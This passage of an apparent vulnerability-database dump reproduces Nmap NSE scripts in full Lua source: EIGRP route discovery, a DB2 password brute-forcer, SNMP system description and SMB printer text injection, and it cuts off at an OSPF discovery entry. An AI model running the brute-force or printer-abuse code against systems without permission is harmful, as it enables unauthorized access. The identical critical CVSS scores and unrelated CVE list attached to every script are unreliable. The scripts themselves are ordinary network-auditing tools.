broadcast-eigrp-discovery.kparams the K metrics.\n-- Defaults to <code>101000</code>.\n-- @args broadcast-eigrp-discovery.interface Interface to send on (overrides -e)\n--\n--@output\n-- Pre-scan script results:\n-- | broadcast-eigrp-discovery:\n-- | 192.168.2.2\n-- | Interface: eth0\n-- | A.S: 1\n-- | Virtual Router ID: 0\n-- | Internal Route\n-- | Destination: 192.168.21.0/24\n-- | Next hop: 0.0.0.0\n-- | Internal Route\n-- | Destination: 192.168.31.0/24\n-- | Next hop: 0.0.0.0\n-- | External Route\n-- | Protocol: Static\n-- | Originating A.S: 0\n-- | Originating Router ID: 192.168.31.1\n-- | Destination: 192.168.60.0/24\n-- | Next hop: 0.0.0.0\n-- | External Route\n-- | Protocol: OSPF\n-- | Originating A.S: 1\n-- | Originating Router ID: 192.168.31.1\n-- | Destination: 192.168.24.0/24\n-- | Next hop: 0.0.0.0\n-- |_ Use the newtargets script-arg to add the results as targets\n--\n\nauthor = \"Hani Benhabiles\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"discovery\", \"broadcast\", \"safe\"}\n\nprerule = function()\n if nmap.address_family() ~= 'inet' then\n stdnse.verbose1(\"is IPv4 only.\")\n return false\n end\n if not nmap.is_privileged() then\n stdnse.verbose1(\"not running for lack of privileges.\")\n return false\n end\n return true\nend\n\n\n-- Sends EIGRP raw packet to EIGRP multicast address.\n--@param interface Network interface to use.\n--@param eigrp_raw Raw eigrp packet.\nlocal eigrpSend = function(interface, eigrp_raw)\n local srcip = interface.address\n local dstip = \"224.0.0.10\"\n\n local ip_raw = stdnse.fromhex( \"45c00040ed780000015818bc0a00c8750a00c86b\") .. eigrp_raw\n local eigrp_packet = packet.Packet:new(ip_raw, ip_raw:len())\n eigrp_packet:ip_set_bin_src(ipOps.ip_to_str(srcip))\n eigrp_packet:ip_set_bin_dst(ipOps.ip_to_str(dstip))\n eigrp_packet:ip_set_len(#eigrp_packet.buf)\n eigrp_packet:ip_count_checksum()\n\n local sock = nmap.new_dnet()\n sock:ethernet_open(interface.device)\n -- Ethernet IPv4 multicast, our ethernet address and packet type IP\n local eth_hdr = stdnse.fromhex(\"01 00 5e 00 00 0a\") .. interface.mac .. stdnse.fromhex(\"08 00\")\n sock:ethernet_send(eth_hdr .. eigrp_packet.buf)\n sock:ethernet_close()\nend\n\n\n-- Listens for EIGRP updates\n--@param interface Network interface to listen on.\n--@param timeout Ammount of time to listen for.\n--@param responses Table to put valid responses into.\nlocal eigrpListener = function(interface, timeout, responses)\n local condvar = nmap.condvar(responses)\n local routers = {}\n local status, l3data, response, p, eigrp_raw, _\n local start = nmap.clock_ms()\n -- Filter for EIGRP packets that are sent either to us or to multicast\n local filter = \"ip proto 88 and (ip dst host \" .. interface.address .. \" or 224.0.0.10)\"\n local listener = nmap.new_socket()\n listener:set_timeout(500)\n listener:pcap_open(interface.device, 1024, true, filter)\n\n -- For each EIGRP packet captured until timeout\n while (nmap.clock_ms() - start) < timeout do\n response = {}\n response.tlvs = {}\n status, _, _, l3data = listener:pcap_receive()\n if status then\n p = packet.Packet:new(l3data, #l3data)\n eigrp_raw = string.sub(l3data, p.ip_hl*4 + 1)\n -- Check if it is an EIGRPv2 Update\n if eigrp_raw:byte(1) == 0x02 and eigrp_raw:byte(2) == 0x01 then\n -- Skip if did get the info from this router before\n if not routers[p.ip_src] then\n -- Parse header\n response = eigrp.EIGRP.parse(eigrp_raw)\n response.src = p.ip_src\n response.interface = interface.shortname\n end\n if response then\n -- See, if it has routing information\n for _,tlv in pairs(response.tlvs) do\n if eigrp.EIGRP.isRoutingTLV(tlv.type) then\n routers[p.ip_src] = true\n table.insert(responses, response)\n break\n end\n end\n end\n end\n end\n end\n condvar(\"signal\")\n return\nend\n\n-- Listens for EIGRP announcements to grab a valid Autonomous System value.\n--@param interface Network interface to listen on.\n--@param timeout Max amount of time to listen for.\n--@param astab Table to put result into.\nlocal asListener = function(interface, timeout, astab)\n local condvar = nmap.condvar(astab)\n local status, l3data, p, eigrp_raw, eigrp_hello, _\n local start = nmap.clock_ms()\n local filter = \"ip proto 88 and ip dst host 224.0.0.10\"\n local listener = nmap.new_socket()\n listener:set_timeout(500)\n listener:pcap_open(interface.device, 1024, true, filter)\n while (nmap.clock_ms() - start) < timeout do\n -- Check if another listener already found an A.S value.\n if #astab > 0 then break end\n\n status, _, _, l3data = listener:pcap_receive()\n if status then\n p = packet.Packet:new(l3data, #l3data)\n eigrp_raw = string.sub(l3data, p.ip_hl*4 + 1)\n -- Listen for EIGRPv2 Hello packets\n if eigrp_raw:byte(1) == 0x02 and eigrp_raw:byte(2) == 0x05 then\n eigrp_hello = eigrp.EIGRP.parse(eigrp_raw)\n if eigrp_hello and eigrp_hello.as then\n table.insert(astab, eigrp_hello.as)\n break\n end\n end\n end\n end\n condvar(\"signal\")\nend\n\nlocal function fail (err) return stdnse.format_output(false, err) end\n\naction = function()\n -- Get script arguments\n local as = stdnse.get_script_args(SCRIPT_NAME .. \".as\")\n local kparams = stdnse.get_script_args(SCRIPT_NAME .. \".kparams\") or \"101000\"\n local timeout = stdnse.parse_timespec(stdnse.get_script_args(SCRIPT_NAME .. \".timeout\"))\n local interface = stdnse.get_script_args(SCRIPT_NAME .. \".interface\")\n local output, responses, interfaces, lthreads = {}, {}, {}, {}\n local result, response, route, eigrp_hello, k\n local timeout = (timeout or 10) * 1000\n\n -- K params should be of length 6\n -- Cisco routers ignore eigrp packets that don't have matching K parameters\n if #kparams < 6 or #kparams > 6 then\n return fail(\"kparams should be of size 6.\")\n else\n k = {}\n k[1] = string.sub(kparams, 1,1)\n k[2] = string.sub(kparams, 2,2)\n k[3] = string.sub(kparams, 3,3)\n k[4] = string.sub(kparams, 4,4)\n k[5] = string.sub(kparams, 5,5)\n k[6] = string.sub(kparams, 6)\n end\n\n interface = interface or nmap.get_interface()\n if interface then\n -- If an interface was provided, get its information\n interface = nmap.get_interface_info(interface)\n if not interface then\n return fail((\"Failed to retrieve %s interface information.\"):format(interface))\n end\n interfaces = {interface}\n stdnse.debug1(\"Will use %s interface.\", interface.shortname)\n else\n local ifacelist = nmap.list_interfaces()\n for _, iface in ipairs(ifacelist) do\n -- Match all ethernet interfaces\n if iface.address and iface.link==\"ethernet\" and\n iface.address:match(\"%d+%.%d+%.%d+%.%d+\") then\n\n stdnse.debug1(\"Will use %s interface.\", iface.shortname)\n table.insert(interfaces, iface)\n end\n end\n end\n\n -- If user didn't provide an Autonomous System value, we listen fro multicast\n -- HELLO router announcements to get one.\n if not as then\n -- We use a table for condvar\n local astab = {}\n stdnse.debug1(\"No A.S value provided, will sniff for one.\")\n -- We should iterate over interfaces\n for _, interface in pairs(interfaces) do\n local co = stdnse.new_thread(asListener, interface, timeout, astab)\n lthreads[co] = true\n end\n local condvar = nmap.condvar(astab)\n -- Wait for the listening threads to finish\n repeat\n for thread in pairs(lthreads) do\n if coroutine.status(thread) == \"dead\" then lthreads[thread] = nil end\n end\n if ( next(lthreads) ) then\n condvar(\"wait\")\n end\n until next(lthreads) == nil;\n\n if #astab > 0 then\n stdnse.debug1(\"Will use %s A.S value.\", astab[1])\n as = astab[1]\n else\n return fail(\"Couldn't get an A.S value.\")\n end\n end\n\n -- Craft Hello packet\n eigrp_hello = eigrp.EIGRP:new(eigrp.OPCODE.HELLO, as)\n -- K params\n eigrp_hello:addTLV({ type = eigrp.TLV.PARAM, k = k, htime = 15})\n -- Software version\n eigrp_hello:addTLV({ type = eigrp.TLV.SWVER, majv = 12, minv = 4, majtlv = 1, mintlv = 2})\n\n -- On each interface, launch the listening thread and send the Hello packet.\n lthreads = {}\n for _, interface in pairs(interfaces) do\n local co = stdnse.new_thread(eigrpListener, interface, timeout, responses)\n -- We insert a small delay before sending the Hello so the listening\n -- thread doesn't miss updates.\n stdnse.sleep(0.5)\n lthreads[co] = true\n eigrpSend(interface, tostring(eigrp_hello))\n end\n\n local condvar = nmap.condvar(responses)\n -- Wait for the listening threads to finish\n repeat\n condvar(\"wait\")\n for thread in pairs(lthreads) do\n if coroutine.status(thread) == \"dead\" then lthreads[thread] = nil end\n end\n until next(lthreads) == nil;\n\n -- Output the useful info from the responses\n if #responses > 0 then\n for _, response in pairs(responses) do\n result = {}\n result.name = response.src\n if target.ALLOW_NEW_TARGETS then target.add(response.src) end\n table.insert(result, \"Interface: \" .. response.interface)\n table.insert(result, (\"A.S: %d\"):format(response.as))\n table.insert(result, (\"Virtual Router ID: %d\"):format(response.routerid))\n -- Output routes information TLVs\n for _, tlv in pairs(response.tlvs) do\n route = {}\n -- We are only interested in Internal or external routes\n if tlv.type == eigrp.TLV.EXT then\n route.name = \"External route\"\n for name, value in pairs(eigrp.EXT_PROTO) do\n if value == tlv.eproto then\n table.insert(route, (\"Protocol: %s\"):format(name))\n break\n end\n end\n table.insert(route, (\"Originating A.S: %s\"):format(tlv.oas))\n table.insert(route, (\"Originating Router ID: %s\"):format(tlv.orouterid))\n if target.ALLOW_NEW_TARGETS then target.add(tlv.orouterid) end\n table.insert(route, (\"Destination: %s/%d\"):format(tlv.dst, tlv.mask))\n table.insert(route, (\"Next hop: %s\"):format(tlv.nexth))\n table.insert(result, route)\n elseif tlv.type == eigrp.TLV.INT then\n route.name = \"Internal route\"\n table.insert(route, (\"Destination: %s/%d\"):format(tlv.dst, tlv.mask))\n table.insert(route, (\"Next hop: %s\"):format(tlv.nexth))\n table.insert(result, route)\n end\n end\n table.insert(output, result)\n end\n if #output>0 and not target.ALLOW_NEW_TARGETS then\n table.insert(output,\"Use the newtargets script-arg to add the results as targets\")\n end\n return stdnse.format_output(true, output)\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:45:35", "description": "Performs password guessing against databases supporting the IBM DB2 protocol such as Informix, DB2 and Derby\n\n## Script Arguments \n\n#### drda-brute.threads \n\nthe amount of accounts to attempt to brute force in parallel (default 10).\n\n#### drda-brute.dbname \n\nthe database name against which to guess passwords (default `\"SAMPLE\"`).\n\n#### passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb \n\nSee the documentation for the [unpwdb](<../lib/unpwdb.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p 50000 --script drda-brute <target>\n \n\n## Script Output \n \n \n 50000/tcp open drda\n | drda-brute:\n |_ db2admin:db2admin => Valid credentials\n\n## Requires \n\n * [coroutine](<>)\n * [drda](<../lib/drda.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n * [unpwdb](<../lib/unpwdb.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-08-14T08:28:56", "type": "nmap", "title": "drda-brute NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:DRDA-BRUTE.NSE", "href": "https://nmap.org/nsedoc/scripts/drda-brute.html", "sourceData": "local coroutine = require \"coroutine\"\nlocal drda = require \"drda\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\nlocal unpwdb = require \"unpwdb\"\n\ndescription = [[\nPerforms password guessing against databases supporting the IBM DB2 protocol such as Informix, DB2 and Derby\n]]\n\n---\n-- @args drda-brute.threads the amount of accounts to attempt to brute\n-- force in parallel (default 10).\n-- @args drda-brute.dbname the database name against which to guess\n-- passwords (default <code>\"SAMPLE\"</code>).\n--\n-- @usage\n-- nmap -p 50000 --script drda-brute <target>\n--\n-- @output\n-- 50000/tcp open drda\n-- | drda-brute:\n-- |_ db2admin:db2admin => Valid credentials\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories={\"intrusive\", \"brute\"}\n\n\n-- Version 0.5\n-- Created 05/08/2010 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>\n-- Revised 05/09/2010 - v0.2 - re-wrote as multi-threaded <patrik@cqure.net>\n-- Revised 05/10/2010 - v0.3 - revised parallelised design <patrik@cqure.net>\n-- Revised 08/14/2010 - v0.4 - renamed script and library from db2* to drda* <patrik@cqure.net>\n-- Revised 09/09/2011 - v0.5 - changed account status text to be more consistent with other *-brute scripts\n\nportrule = shortport.port_or_service({50000,60000}, {\"drda\",\"ibm-db2\"}, \"tcp\", {\"open\", \"open|filtered\"})\n\n--- Credential iterator\n--\n-- @param usernames iterator from unpwdb\n-- @param passwords iterator from unpwdb\n-- @return username string\n-- @return password string\nlocal function new_usrpwd_iterator (usernames, passwords)\n local function next_username_password ()\n for username in usernames do\n for password in passwords do\n coroutine.yield(username, password)\n end\n passwords(\"reset\")\n end\n while true do coroutine.yield(nil, nil) end\n end\n return coroutine.wrap(next_username_password)\nend\n\n--- Iterates over the password list and guesses passwords\n--\n-- @param host table with information as received by <code>action</code>\n-- @param port table with information as received by <code>action</code>\n-- @param database string containing the database name\n-- @param creds an iterator producing username, password pairs\n-- @param valid_accounts table in which to store found accounts\ndoLogin = function( host, port, database, creds, valid_accounts )\n local helper, status, response, passwords\n local condvar = nmap.condvar( valid_accounts )\n\n for username, password in creds do\n -- Checks if a password was already discovered for this account\n if ( nmap.registry.db2users == nil or nmap.registry.db2users[username] == nil ) then\n helper = drda.Helper:new()\n helper:connect( host, port )\n stdnse.debug1( \"Trying %s/%s against %s...\", username, password, host.ip )\n status, response = helper:login( database, username, password )\n helper:close()\n\n if ( status ) then\n -- Add credentials for future drda scripts to use\n if nmap.registry.db2users == nil then\n nmap.registry.db2users = {}\n end\n nmap.registry.db2users[username]=password\n table.insert( valid_accounts, string.format(\"%s:%s => Valid credentials\", username, password:len()>0 and password or \"<empty>\" ) )\n end\n end\n end\n condvar(\"broadcast\")\nend\n\n--- Checks if the supplied database exists\n--\n-- @param host table with information as received by <code>action</code>\n-- @param port table with information as received by <code>action</code>\n-- @param database string containing the database name\n-- @return status true on success, false on failure\nisValidDb = function( host, port, database )\n local status, response\n local helper = drda.Helper:new()\n\n helper:connect( host, port )\n -- Authenticate with a static probe account to see if the db is valid\n status, response = helper:login( database, \"dbnameprobe1234\", \"dbnameprobe1234\" )\n helper:close()\n\n if ( not(status) and response:match(\"Login failed\") ) then\n return true\n end\n return false\nend\n\n--- Returns the amount of currently active threads\n--\n-- @param threads table containing the list of threads\n-- @return count number containing the number of non-dead threads\nthreadCount = function( threads )\n local count = 0\n\n for thread in pairs(threads) do\n if ( coroutine.status(thread) == \"dead\" ) then\n threads[thread] = nil\n else\n count = count + 1\n end\n end\n return count\nend\n\naction = function( host, port )\n\n local result, response, status = {}, nil, nil\n local valid_accounts, threads = {}, {}\n local usernames, passwords, creds\n local database = stdnse.get_script_args('drda-brute.dbname') or \"SAMPLE\"\n local condvar = nmap.condvar( valid_accounts )\n local max_threads = tonumber( stdnse.get_script_args('drda-brute.threads') ) or 10\n\n -- Check if the DB specified is valid\n if( not(isValidDb(host, port, database)) ) then\n return (\"The databases %s was not found. (Use --script-args drda-brute.dbname=<dbname> to specify database)\"):format(database)\n end\n\n status, usernames = unpwdb.usernames()\n if ( not(status) ) then\n return \"Failed to load usernames\"\n end\n\n -- make sure we have a valid pw file\n status, passwords = unpwdb.passwords()\n if ( not(status) ) then\n return \"Failed to load passwords\"\n end\n\n creds = new_usrpwd_iterator( usernames, passwords )\n\n stdnse.debug1(\"Starting brute force with %d threads\", max_threads )\n\n for i=1,max_threads do\n local co = stdnse.new_thread( doLogin, host, port, database, creds, valid_accounts )\n threads[co] = true\n end\n\n -- wait for all threads to finish running\n while threadCount(threads)>0 do\n condvar(\"wait\")\n end\n\n return stdnse.format_output(true, valid_accounts)\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:34:27", "description": "Attempts to extract system information from an SNMP service.\n\n## Script Arguments \n\n#### snmp.version \n\nSee the documentation for the [snmp](<../lib/snmp.html#script-args>) library. \n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -sU -p 161 --script snmp-sysdescr <target>\n \n\n## Script Output \n \n \n | snmp-sysdescr: HP ETHERNET MULTI-ENVIRONMENT,ROM A.25.80,JETDIRECT,JD117,EEPROM V.28.22,CIDATE 08/09/2006\n |_ System uptime: 28 days, 17:18:59 (248153900 timeticks)\n\n## Requires \n\n * [datetime](<../lib/datetime.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [snmp](<../lib/snmp.html>)\n * [string](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2008-11-06T02:52:59", "type": "nmap", "title": "snmp-sysdescr NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2020-10-09T02:43:26", "id": "NMAP:SNMP-SYSDESCR.NSE", "href": "https://nmap.org/nsedoc/scripts/snmp-sysdescr.html", "sourceData": "local datetime = require \"datetime\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal snmp = require \"snmp\"\nlocal string = require \"string\"\n\ndescription = [[\nAttempts to extract system information from an SNMP service.\n]]\n\n---\n-- @usage\n-- nmap -sU -p 161 --script snmp-sysdescr <target>\n--\n-- @output\n-- | snmp-sysdescr: HP ETHERNET MULTI-ENVIRONMENT,ROM A.25.80,JETDIRECT,JD117,EEPROM V.28.22,CIDATE 08/09/2006\n-- |_ System uptime: 28 days, 17:18:59 (248153900 timeticks)\n\nauthor = \"Thomas Buchanan\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"default\", \"discovery\", \"safe\"}\n\ndependencies = {\"snmp-brute\"}\n\n\nportrule = shortport.port_or_service(161, \"snmp\", \"udp\", {\"open\", \"open|filtered\"})\n\n---\n-- Sends SNMP packets to host and reads responses\naction = function(host, port)\n\n local snmpHelper = snmp.Helper:new(host, port)\n snmpHelper:connect()\n\n -- build a SNMP v1 packet\n -- copied from packet capture of snmpget exchange\n -- get value: 1.3.6.1.2.1.1.1.0 (SNMPv2-MIB::sysDescr.0)\n local status, response = snmpHelper:get({reqId=28428}, \"1.3.6.1.2.1.1.1.0\")\n\n if not status then\n return\n end\n\n -- since we got something back, the port is definitely open\n nmap.set_port_state(host, port, \"open\")\n\n local result = response and response[1] and response[1][1]\n\n -- build a SNMP v1 packet\n -- copied from packet capture of snmpget exchange\n -- get value: 1.3.6.1.2.1.1.3.0 (SNMPv2-MIB::sysUpTime.0)\n status, response = snmpHelper:get({reqId=28428}, \"1.3.6.1.2.1.1.3.0\")\n\n if not status then\n return result\n end\n\n local uptime = response and response[1] and response[1][1]\n if not uptime then\n return\n end\n\n result = result .. \"\\n\" .. string.format(\" System uptime: %s (%s timeticks)\", datetime.format_time(uptime, 100), tostring(uptime))\n\n return result\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:35:19", "description": "Attempts to print text on a shared printer by calling Print Spooler Service RPC functions. \n\nIn order to use the script, at least one printer needs to be shared over SMB. If no printer is specified, script tries to enumerate existing ones by calling LANMAN API which might not be always available. LANMAN is available by default on Windows XP, but not on Vista or Windows 7 for example. In that case, you need to specify printer share name manually using `printer` script argument. You can find out available shares by using smb-enum-shares script. \n\nLater versions of Windows require valid credentials by default which you can specify trough smb library arguments `smbuser` and `smbpassword` or other options.\n\n## Script Arguments \n\n#### text \n\nText to print. Either text or filename need to be specified.\n\n#### filename \n\nFile to read text from (ASCII only).\n\n#### printer \n\nPrinter share name. Optional, by default script tries to enumerate available printer shares.\n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the [smb](<../lib/smb.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p 445 <target> --script=smb-print-text --script-args=\"text=0wn3d\"\n \n\n## Script Output \n \n \n |_smb-print-text: Printer job started using MyPrinter printer share.\n \n\n## Requires \n\n * [io](<>)\n * [msrpc](<../lib/msrpc.html>)\n * [smb](<../lib/smb.html>)\n * [string](<>)\n * [stdnse](<../lib/stdnse.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-08-04T18:44:59", "type": "nmap", "title": "smb-print-text NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-09-06T14:20:33", "id": "NMAP:SMB-PRINT-TEXT.NSE", "href": "https://nmap.org/nsedoc/scripts/smb-print-text.html", "sourceData": "local io = require \"io\"\nlocal msrpc = require \"msrpc\"\nlocal smb = require \"smb\"\nlocal string = require \"string\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nAttempts to print text on a shared printer by calling Print Spooler Service RPC functions.\n\nIn order to use the script, at least one printer needs to be shared\nover SMB. If no printer is specified, script tries to enumerate existing\nones by calling LANMAN API which might not be always available.\nLANMAN is available by default on Windows XP, but not on Vista or Windows 7\nfor example. In that case, you need to specify printer share name manually\nusing <code>printer</code> script argument. You can find out available shares\nby using smb-enum-shares script.\n\nLater versions of Windows require valid credentials by default\nwhich you can specify trough smb library arguments <code>smbuser</code> and\n<code>smbpassword</code> or other options.\n\n]]\n---\n-- @usage nmap -p 445 <target> --script=smb-print-text --script-args=\"text=0wn3d\"\n--\n-- @output\n-- |_smb-print-text: Printer job started using MyPrinter printer share.\n--\n-- @args printer Printer share name. Optional, by default script tries to enumerate available printer shares.\n-- @args text Text to print. Either text or filename need to be specified.\n-- @args filename File to read text from (ASCII only).\n--\n\nauthor = \"Aleksandar Nikolic\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\"}\n\nhostrule = function(host)\n return smb.get_port(host) ~= nil\nend\n\naction = function(host,port)\n local status, smbstate\n local text = stdnse.get_script_args(SCRIPT_NAME .. '.text')\n local filename = stdnse.get_script_args(SCRIPT_NAME .. '.filename')\n if (not text) and (not filename) then\n stdnse.debug1(\"Script requires either text or filename script argument.\")\n return false\n end\n local text_to_print\n if text then\n text_to_print = text\n else\n -- read text from file\n local file = io.open(filename, \"rb\")\n text_to_print = file:read(\"a\")\n file:close()\n end\n status, smbstate = msrpc.start_smb(host, msrpc.SPOOLSS_PATH,true)\n if(status == false) then\n stdnse.debug1(\"SMB: \" .. smbstate)\n return false, smbstate\n end\n\n local bind_result\n status, bind_result = msrpc.bind(smbstate,msrpc.SPOOLSS_UUID, msrpc.SPOOLSS_VERSION, nil)\n if(status == false) then\n msrpc.stop_smb(smbstate)\n stdnse.debug1(\"SMB: \" .. bind_result)\n return false, bind_result\n end\n local printer = stdnse.get_script_args(SCRIPT_NAME .. '.printer')\n -- if printer not set find available printers\n if not printer then\n stdnse.debug1(\"No printer specified, trying to find one...\")\n local lanman_result\n local REMSmb_NetShareEnum_P = \"WrLeh\"\n local REMSmb_share_info_1 = \"B13BWz\"\n status, lanman_result = msrpc.call_lanmanapi(smbstate,0,REMSmb_NetShareEnum_P,REMSmb_share_info_1,string.pack(\"<I2I2\", 0x01, 65406))\n if status == false then\n stdnse.debug1(\"SMB: \" .. lanman_result)\n stdnse.debug1(\"SMB: Looks like LANMAN API is not available. Try setting printer script arg.\")\n return false\n end\n\n local parameters = lanman_result.parameters\n local data = lanman_result.data\n local status, convert, entry_count, available_entries = string.unpack(\"<I2 I2 I2 I2\", parameters)\n local pos = 1\n for i = 1, entry_count, 1 do\n local name, share_type = string.unpack(\">c14 I2\", data, pos)\n\n if share_type == 1 then -- share is printer\n name = string.unpack(\"z\", name)\n stdnse.debug1(\"Found printer share %s.\", name)\n printer = name\n break\n end\n pos = pos + 20\n end\n end\n if not printer then\n stdnse.debug1(\"No printer found, system may be unpatched but it needs at least one printer shared to be vulnerable.\")\n return false\n end\n stdnse.debug1(\"Using %s as printer.\",printer)\n -- call RpcOpenPrinterEx - opnum 69\n local status, result = msrpc.spoolss_open_printer(smbstate,\"\\\\\\\\\"..host.ip..\"\\\\\"..printer)\n if not status then\n return false\n end\n local printer_handle = string.sub(result.data,25,#result.data-4)\n stdnse.debug1(\"Printer handle %s\",stdnse.tohex(printer_handle))\n -- call RpcStartDocPrinter - opnum 17\n status,result = msrpc.spoolss_start_doc_printer(smbstate,printer_handle,\"nmap_print_test.txt\") -- patched version will allow this\n if not status then\n return false\n end\n local print_job_id = string.sub(result.data,25,#result.data-4)\n stdnse.debug1(\"Start doc printer job id %s\",stdnse.tohex(print_job_id))\n\n -- call RpcWritePrinter - 19\n status, result = msrpc.spoolss_write_printer(smbstate,printer_handle,text_to_print)\n if not status then\n return false\n end\n local write_result = string.sub(result.data,25,#result.data-4)\n stdnse.debug1(\"Written %s bytes to a file.\",stdnse.tohex(write_result))\n\n status,result = msrpc.spoolss_end_doc_printer(smbstate,printer_handle)\n\n return string.format(\"Printer job started using <%s> printer share.\", printer)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:55", "description": "Discover IPv4 networks using Open Shortest Path First version 2(OSPFv2) protocol. \n\nThe script works by listening for OSPF Hello packets from the 224.0.0.5 multicast address. The script then replies and attempts to create a neighbor relationship, in order to discover network database. \n\nIf no interface was provided as a script argument or through the -e option, the script will fail unless a single interface is present on the system.\n\n## Script Arguments \n\n#### broadcast-ospf2-discover.md5_key \n\nMD5 digest key to use if message digest authentication is disclosed.\n\n#### broadcast-ospf2-discover.router_id \n\nRouter ID to use. Defaults to 0.0.0.1\n\n#### broadcast-ospf2-discover.timeout \n\nTime in seconds that the script waits for hello from other routers. Defaults to 10 seconds, matching OSPFv2 default value for hello interval.\n\n#### broadcast-ospf2-discover.interface \n\nInterface to send on (overrides -e). Mandatory if not using -e and multiple interfaces are present.\n\n#### max-newtargets, newtargets \n\nSee the documentation for the [target](<../lib/target.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script=broadcast-ospf2-discover\n nmap --script=broadcast-ospf2-discover -e wlan0\n \n\n## Script Output \n \n \n Pre-scan script results:\n | broadcast-ospf2-discover:\n | Area ID: 0.0.0.0\n | External Routes\n | 192.168.24.0/24\n |_ Use the newtargets script-arg to add the results as targets\n \n\n## Requires \n\n * [ipOps](<../lib/ipOps.html>)\n * [nmap](<../lib/nmap.html>)\n * [ospf](<../lib/ospf.html>)\n * [packet](<../lib/packet.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [target](<../lib/target.html>)\n * [os](<>)\n * [string](<>)\n * [table](<>)\n * [openssl](<../lib/openssl.html>)\n\n* * *\n", "cvss3": 